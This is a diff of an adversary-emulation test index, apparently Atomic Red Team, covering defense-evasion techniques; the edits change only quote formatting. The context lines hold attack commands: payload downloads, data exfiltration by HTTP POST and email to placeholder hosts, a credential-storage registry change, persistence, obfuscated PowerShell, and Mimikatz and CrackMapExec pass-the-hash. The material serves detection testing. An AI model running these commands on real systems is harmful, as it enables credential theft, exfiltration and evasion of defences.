description: 'Executes the Install Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31124,10 +31124,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31170,7 +31170,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31195,10 +31195,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31242,7 +31242,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, version information
will be displayed the .NET framework install utility.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31267,10 +31267,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31313,7 +31313,7 @@ defense-evasion:
description: 'Executes the Uninstall Method. Upon execution, help information
will be displayed for InstallUtil.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -31338,10 +31338,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31395,10 +31395,10 @@ defense-evasion:
- description: 'InstallUtil test harness script must be installed at specified
location (#{test_harness})
-'
+ '
prereq_command: 'if (Test-Path "#{test_harness}") {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{test_harness}) -ErrorAction ignore | Out-Null
Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.004/src/InstallUtilTestHarness.ps1' -OutFile "#{test_harness}"
@@ -31605,7 +31605,7 @@ defense-evasion:
description: 'Changes a file or folder''s permissions using chmod and a specified
numeric mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31621,14 +31621,14 @@ defense-evasion:
executor:
command: 'chmod #{numeric_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (symbolic mode)
auto_generated_guid: fc9d6695-d022-4a80-91b1-381f5c35aff3
description: 'Changes a file or folder''s permissions using chmod and a specified
symbolic mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31644,14 +31644,14 @@ defense-evasion:
executor:
command: 'chmod #{symbolic_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (numeric mode) recursively
auto_generated_guid: ea79f937-4a4d-4348-ace6-9916aec453a4
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified numeric mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31667,14 +31667,14 @@ defense-evasion:
executor:
command: 'chmod -R #{numeric_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chmod - Change file or folder mode (symbolic mode) recursively
auto_generated_guid: 0451125c-b5f6-488f-993b-5a32b09f7d8f
description: 'Changes a file or folder''s permissions recursively using chmod
and a specified symbolic mode.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31690,14 +31690,14 @@ defense-evasion:
executor:
command: 'chmod -R #{symbolic_mode} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership and group
auto_generated_guid: d169e71b-85f9-44ec-8343-27093ff3dfc0
description: 'Changes a file or folder''s ownership and group information using
chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31717,14 +31717,14 @@ defense-evasion:
executor:
command: 'chown #{owner}:#{group} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership and group recursively
auto_generated_guid: b78598be-ff39-448f-a463-adbf2a5b7848
description: 'Changes a file or folder''s ownership and group information recursively
using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31744,13 +31744,13 @@ defense-evasion:
executor:
command: 'chown -R #{owner}:#{group} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder mode ownership only
auto_generated_guid: 967ba79d-f184-4e0e-8d09-6362b3162e99
description: 'Changes a file or folder''s ownership only using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31766,13 +31766,13 @@ defense-evasion:
executor:
command: 'chown #{owner} #{file_or_folder}
-'
+ '
name: bash
- name: chown - Change file or folder ownership recursively
auto_generated_guid: 3b015515-b3d8-44e9-b8cd-6fa84faf30b2
description: 'Changes a file or folder''s ownership only recursively using chown.
-'
+ '
supported_platforms:
- macos
- linux
@@ -31788,7 +31788,7 @@ defense-evasion:
executor:
command: 'chown -R #{owner} #{file_or_folder}
-'
+ '
name: bash
- name: chattr - Remove immutable file attribute
auto_generated_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f
@@ -31806,7 +31806,7 @@ defense-evasion:
executor:
command: 'chattr -i #{file_to_modify}
-'
+ '
name: sh
T1078.003:
technique:
@@ -32047,7 +32047,7 @@ defense-evasion:
C# project example file (T1127.001.csproj) will simply print "Hello From a
Code Fragment" and "Hello From a Class." to the screen.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32067,10 +32067,10 @@ defense-evasion:
dependencies:
- description: 'Project file must exist on disk at specified location (#{filename})
-'
+ '
prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/T1127.001.csproj" -OutFile "#{filename}"
@@ -32083,7 +32083,7 @@ defense-evasion:
Visual Basic example file (vb.xml) will simply print "Hello from a Visual
Basic inline task!" to the screen.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32103,10 +32103,10 @@ defense-evasion:
dependencies:
- description: 'Project file must exist on disk at specified location (#{filename})
-'
+ '
prereq_command: 'if (Test-Path #{filename}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127.001/src/vb.xml" -OutFile "#{filename}"
@@ -32229,7 +32229,7 @@ defense-evasion:
Red Team repo, and mount the image. The provided sample ISO simply has a Reports
shortcut file in it. Reference: https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32241,20 +32241,20 @@ defense-evasion:
dependencies:
- description: 'T1553.005.iso must exist on disk at specified location (#{path_of_iso})
-'
+ '
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/T1553.005.iso -OutFile "#{path_of_iso}"
executor:
command: 'Mount-DiskImage -ImagePath "#{path_of_iso}"
-'
+ '
cleanup_command: 'Dismount-DiskImage -ImagePath "#{path_of_iso}" | Out-Null
-'
+ '
name: powershell
- name: Mount an ISO image and run executable from the ISO
auto_generated_guid: 42f22b00-0242-4afc-a61b-0da05041f9cc
@@ -32276,10 +32276,10 @@ defense-evasion:
dependencies:
- description: 'FeelTheBurn.iso must exist on disk at specified location (#{path_of_iso})
-'
+ '
prereq_command: 'if (Test-Path #{path_of_iso}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{path_of_iso}) -ErrorAction ignore | Out-Null
Invoke-WebRequest https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1553.005/bin/FeelTheBurn.iso -OutFile "#{path_of_iso}"
@@ -32313,18 +32313,18 @@ defense-evasion:
- description: A test file with the Zone.Identifier attribute must be present.
prereq_command: 'if (Test-Path #{file_path}) { EXIT 0 } else { EXIT 1 }
-'
+ '
get_prereq_command: |
Invoke-WebRequest #{file_to_download} -OutFile #{file_path}
Set-Content -Path #{file_path} -Stream Zone.Identifier -Value '[ZoneTransfer]','ZoneId=3'
executor:
command: 'Unblock-File -Path #{file_path}
-'
+ '
cleanup_command: 'Set-Content -Path #{file_path} -Stream Zone.Identifier -Value
''[ZoneTransfer]'',''ZoneId=3''
-'
+ '
name: powershell
T1036.004:
technique:
@@ -32401,7 +32401,7 @@ defense-evasion:
schtasks /query /tn win32times
cleanup_command: 'schtasks /tn win32times /delete /f
-'
+ '
name: command_prompt
elevation_required: true
- name: Creating W32Time similar named service using sc
@@ -32416,7 +32416,7 @@ defense-evasion:
sc qc win32times
cleanup_command: 'sc delete win32times
-'
+ '
name: command_prompt
elevation_required: true
T1036:
@@ -32519,11 +32519,11 @@ defense-evasion:
prereq_command: 'if (Test-Path $env:userprofile\Downloads\T1036.zip) {exit
0} else {exit 1}
-'
+ '
get_prereq_command: 'Invoke-WebRequest -OutFile "$env:userprofile\Downloads\T1036.zip"
#{url}
-'
+ '
executor:
command: |-
Expand-Archive -Path $env:userprofile\Downloads\T1036.zip -DestinationPath $env:userprofile\Downloads\T1036 -Force
@@ -32598,7 +32598,7 @@ defense-evasion:
description: 'Create and execute a process from a directory masquerading as
the current parent directory (`...` instead of normal `..`)
-'
+ '
supported_platforms:
- macos
- linux
@@ -32622,7 +32622,7 @@ defense-evasion:
description: 'Launch an executable that attempts to masquerade as a legitimate
executable.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -32645,7 +32645,7 @@ defense-evasion:
cleanup_command: 'Remove-Item -Path "#{executable_filepath}" -ErrorAction
Ignore
-'
+ '
name: powershell
T1218.013:
technique:
@@ -32941,11 +32941,11 @@ defense-evasion:
command: 'reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/t REG_DWORD /v HideFileExt /d 1 /f
-'
+ '
cleanup_command: 'reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
/v HideFileExt /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Modify Registry of Local Machine - cmd
@@ -32965,11 +32965,11 @@ defense-evasion:
command: 'reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/t REG_EXPAND_SZ /v SecurityHealth /d #{new_executable} /f
-'
+ '
cleanup_command: 'reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
/v SecurityHealth /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Modify registry to store logon credentials
@@ -32984,11 +32984,11 @@ defense-evasion:
command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 1 /f
-'
+ '
cleanup_command: 'reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest
/v UseLogonCredential /t REG_DWORD /d 0 /f >nul 2>&1
-'
+ '
name: command_prompt
elevation_required: true
- name: Add domain to Trusted sites Zone
@@ -33029,11 +33029,11 @@ defense-evasion:
command: 'New-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet
Settings" -Name T1112 -Value "''"
-'
+ '
name: command_prompt
T1218.007:
technique:
@@ -34063,7 +34063,7 @@ defense-evasion:
auto_generated_guid: a059b6c4-e7d6-4b2e-bcd7-9b2b33191a04
description: 'Executes an MSI containing embedded JScript code using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34076,30 +34076,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with embedded VBScript
auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064
description: 'Executes an MSI containing embedded VBScript code using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34112,30 +34112,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded DLL
auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568
description: 'Executes an MSI containing an embedded DLL using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34148,30 +34148,30 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Local MSI file with an embedded EXE
auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8
description: 'Executes an MSI containing an embedded EXE using msiexec.exe
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34184,31 +34184,31 @@ defense-evasion:
j (advertise). The included MSI is designed to support all three action
types.
-'
+ '
type: String
default: i
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /q /#{action} "#{msi_payload}"
-'
+ '
name: command_prompt
- name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript
auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30
description: 'Executes an MSI containing embedded JScript code using the WMI
Win32_Product class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34220,32 +34220,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with embedded VBScript
auto_generated_guid: cf470d9a-58e7-43e5-b0d2-805dffc05576
description: 'Executes an MSI containing embedded VBScript code using the WMI
Win32_Product class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34257,32 +34257,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded DLL
auto_generated_guid: 32eb3861-30da-4993-897a-42737152f5f8
description: 'Executes an MSI containing an embedded DLL using the WMI Win32_Product
class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34294,32 +34294,32 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: WMI Win32_Product Class - Execute Local MSI file with an embedded EXE
auto_generated_guid: 55080eb0-49ae-4f55-a440-4167b7974f79
description: 'Executes an MSI containing an embedded EXE using the WMI Win32_Product
class
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34331,25 +34331,25 @@ defense-evasion:
description: 'Specifies the MSI action to perform: Install, Admin, Advertise.
The included MSI is designed to support all three action types.
-'
+ '
type: String
default: Install
dependency_executor_name: powershell
dependencies:
- description: 'The MSI file must exist on disk at specified location (#{msi_payload})
-'
+ '
prereq_command: 'if (Test-Path #{msi_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'Invoke-CimMethod -ClassName Win32_Product -MethodName #{action}
-Arguments @{ PackageLocation = ''#{msi_payload}'' }
-'
+ '
name: powershell
- name: Msiexec.exe - Execute the DllRegisterServer function of a DLL
auto_generated_guid: 0106ffa5-fab6-4c7d-82e3-e6b8867d5e5d
@@ -34357,7 +34357,7 @@ defense-evasion:
Note: the DLL included in the "src" folder is only built for 64-bit, so this
won''t work on a 32-bit OS.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34369,17 +34369,17 @@ defense-evasion:
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /y "#{dll_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL
auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f
@@ -34387,7 +34387,7 @@ defense-evasion:
function. Note: the DLL included in the "src" folder is only built for 64-bit,
so this won''t work on a 32-bit OS.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34400,17 +34400,17 @@ defense-evasion:
dependencies:
- description: 'The DLL must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host "You must provide your own MSI"
-'
+ '
executor:
command: 'msiexec.exe /z "#{dll_payload}"
-'
+ '
name: command_prompt
- name: Msiexec.exe - Execute Remote MSI file
auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662
@@ -34418,7 +34418,7 @@ defense-evasion:
in application installation, commonly seen in malware execution. The MSI executes
a built-in JScript payload that launches powershell.exe.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34429,7 +34429,7 @@ defense-evasion:
executor:
command: 'msiexec.exe /q /i "#{msi_payload}"
-'
+ '
name: command_prompt
T1564.004:
technique:
@@ -34569,7 +34569,7 @@ defense-evasion:
Start-Process -FilePath "$env:comspec" -ArgumentList "/c,type,#{payload_path},>,`"#{ads_file_path}:#{ads_name}`""
cleanup_command: 'Remove-Item "#{ads_file_path}" -Force -ErrorAction Ignore
-'
+ '
name: powershell
- name: Create ADS command prompt
auto_generated_guid: 17e7637a-ddaf-4a82-8622-377e20de8fdb
@@ -34593,7 +34593,7 @@ defense-evasion:
for /f "usebackq delims=?" %i in (#{file_name}:#{ads_filename}) do %i
cleanup_command: 'del #{file_name} >nul 2>&1
-'
+ '
name: command_prompt
- name: Create ADS PowerShell
auto_generated_guid: 0045ea16-ed3c-4d4c-a9ee-15e44d1560d1
@@ -34615,13 +34615,13 @@ defense-evasion:
dependencies:
- description: 'The file must exist on disk at specified location (#{file_name})
-'
+ '
prereq_command: 'if (Test-Path #{file_name}) { exit 0 } else { exit 1 }
-'
+ '
get_prereq_command: 'New-Item -Path #{file_name} | Out-Null
-'
+ '
executor:
command: |
echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test"
@@ -34629,7 +34629,7 @@ defense-evasion:
set-content -path . -stream #{ads_filename} -value "test3"
cleanup_command: 'Remove-Item -Path #{file_name} -ErrorAction Ignore
-'
+ '
name: powershell
T1599.001:
technique:
@@ -34838,7 +34838,7 @@ defense-evasion:
auto_generated_guid: 14c38f32-6509-46d8-ab43-d53e32d2b131
description: 'Add a Network Share utilizing the command_prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34855,7 +34855,7 @@ defense-evasion:
auto_generated_guid: '09210ad5-1ef2-4077-9ad3-7351e13e9222'
description: 'Removes a Network Share utilizing the command_prompt
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -34866,13 +34866,13 @@ defense-evasion:
executor:
command: 'net share #{share_name} /delete
-'
+ '
name: command_prompt
- name: Remove Network Share PowerShell
auto_generated_guid: 0512d214-9512-4d22-bde7-f37e058259b3
description: 'Removes a Network Share utilizing PowerShell
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35117,14 +35117,14 @@ defense-evasion:
cleanup_command: 'Remove-ItemProperty -Force -ErrorAction Ignore -Path #{registry_key_storage}
-Name #{registry_entry_storage}
-'
+ '
name: powershell
- name: Execution from Compressed File
auto_generated_guid: f8c8a909-5f29-49ac-9244-413936ce6d1f
description: 'Mimic execution of compressed executable. When successfully executed,
calculator.exe will open.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35136,11 +35136,11 @@ defense-evasion:
dependencies:
- description: 'T1027.exe must exist on disk at $env:temp\temp_T1027.zip\T1027.exe
-'
+ '
prereq_command: 'if (Test-Path $env:temp\temp_T1027.zip\T1027.exe) {exit 0}
else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
Invoke-WebRequest "#{url_path}" -OutFile "$env:temp\T1027.zip"
@@ -35148,7 +35148,7 @@ defense-evasion:
executor:
command: '"%temp%\temp_T1027.zip\T1027.exe"
-'
+ '
cleanup_command: |
taskkill /f /im calculator.exe >nul 2>nul
rmdir /S /Q %temp%\temp_T1027.zip >nul 2>nul
@@ -35182,7 +35182,7 @@ defense-evasion:
command: 'Send-MailMessage -From #{sender} -To #{receiver} -Subject ''T1027_Atomic_Test''
-Attachments #{input_file} -SmtpServer #{smtp_server}
-'
+ '
name: powershell
- name: DLP Evasion via Sensitive Data in VBA Macro over HTTP
auto_generated_guid: e2d85e66-cb66-4ed7-93b1-833fc56c9319
@@ -35203,7 +35203,7 @@ defense-evasion:
executor:
command: 'Invoke-WebRequest -Uri #{ip_address} -Method POST -Body #{input_file}
-'
+ '
name: powershell
- name: Obfuscated Command in PowerShell
auto_generated_guid: 8b3f4ed6-077b-4bdd-891c-2d237f19410f
@@ -35211,7 +35211,7 @@ defense-evasion:
"Hello, from PowerShell!". Example is from the 2021 Threat Detection Report
by Red Canary.
-'
+ '
supported_platforms:
- windows
executor:
@@ -35222,7 +35222,7 @@ defense-evasion:
120, 157 ,167,145 , 162 ,123,150 ,145 , 154 , 154 , 41,47)| .(''%'') { (
[CHAR] ( $Pz2sB0::"t`OinT`16"(( [sTring]${_}) ,8)))})) )
-'
+ '
name: powershell
- name: Obfuscated Command Line using special Unicode characters
auto_generated_guid: e68b945c-52d0-4dd9-a5e8-d173d70c448f
@@ -35320,7 +35320,7 @@ defense-evasion:
auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2
description: 'Execute arbitrary DLL file stored locally.
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35332,17 +35332,17 @@ defense-evasion:
dependencies:
- description: 'T1218-2.dll must exist on disk at specified location (#{dll_payload})
-'
+ '
prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.008/src/Win32/T1218-2.dll" -OutFile "#{dll_payload}"
executor:
command: 'odbcconf.exe /S /A {REGSVR "#{dll_payload}"}
-'
+ '
name: command_prompt
T1134.004:
technique:
@@ -35455,10 +35455,10 @@ defense-evasion:
dependencies:
- description: 'DLL to inject must exist on disk at specified location (#{dll_path})
-'
+ '
prereq_command: 'if (Test-Path #{dll_path}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
New-Item -Type Directory (split-path #{dll_path}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1134.004/bin/calc.dll" -OutFile "#{dll_path}"
@@ -35499,7 +35499,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -FilePath #{file_path} -CommandLine
''#{command_line}'' -ParentId #{parent_pid}'
@@ -35528,7 +35528,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-ATHProcessUnderSpecificParent -ParentId #{parent_pid} -TestGuid
#{test_guid}'
@@ -35558,7 +35558,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Get-CimInstance -ClassName Win32_Process -Property Name, CommandLine,
ProcessId -Filter "Name = ''svchost.exe'' AND CommandLine LIKE ''%''" |
@@ -35594,7 +35594,7 @@ defense-evasion:
get_prereq_command: 'Install-Module -Name AtomicTestHarnesses -Scope CurrentUser
-Force
-'
+ '
executor:
command: 'Start-Process -FilePath #{parent_name} -PassThru | Start-ATHProcessUnderSpecificParent
-FilePath #{file_path} -CommandLine ''#{command_line}'''
@@ -35679,7 +35679,7 @@ defense-evasion:
- description: 'Mimikatz executor must exist on disk and at specified location
(#{mimikatz_path})
-'
+ '
prereq_command: |
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1}
@@ -35694,13 +35694,13 @@ defense-evasion:
command: '#{mimikatz_path} "sekurlsa::pth /user:#{user_name} /domain:#{domain}
/ntlm:#{ntlm}"
-'
+ '
name: command_prompt
- name: crackmapexec Pass the Hash
auto_generated_guid: eb05b028-16c8-4ad8-adea-6f5b219da9a9
description: 'command execute with crackmapexec
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35729,14 +35729,14 @@ defense-evasion:
- description: 'CrackMapExec executor must exist on disk at specified location
(#{crackmapexec_exe})
-'
+ '
prereq_command: 'if(Test-Path #{crackmapexec_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: 'Write-Host Automated installer not implemented yet, please
install crackmapexec manually at this location: #{crackmapexec_exe}
-'
+ '
executor:
command: "#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command}\n"
name: command_prompt
@@ -35817,7 +35817,7 @@ defense-evasion:
auto_generated_guid: dbf38128-7ba7-4776-bedf-cc2eed432098
description: 'Similar to PTH, but attacking Kerberos
-'
+ '
supported_platforms:
- windows
input_arguments:
@@ -35834,10 +35834,10 @@ defense-evasion:
dependencies:
- description: 'Mimikatz must exist on disk at specified location (#{mimikatz_exe})
-'
+ '
prereq_command: 'if (Test-Path #{mimikatz_exe}) {exit 0} else {exit 1}
-'
+ '
get_prereq_command: |
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$mimikatz_relative_uri = Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/latest" -UseBasicParsing | Select-Object -ExpandProperty Links | Where-Object -Property href -Like "*/mimikatz_trunk.zip" | Select-Object -ExpandProperty href
@@ -35848,7 +35848,7 @@ defense-evasion:
executor:
command: '#{mimikatz_exe} "kerberos::ptt #{ticket}"
-'
+ '
name: command_prompt
- name: Rubeus Kerberos Pass The Ticket
auto_generated_guid: a2fc4ec5-12c6-4fb4-b661-961f23f359cb
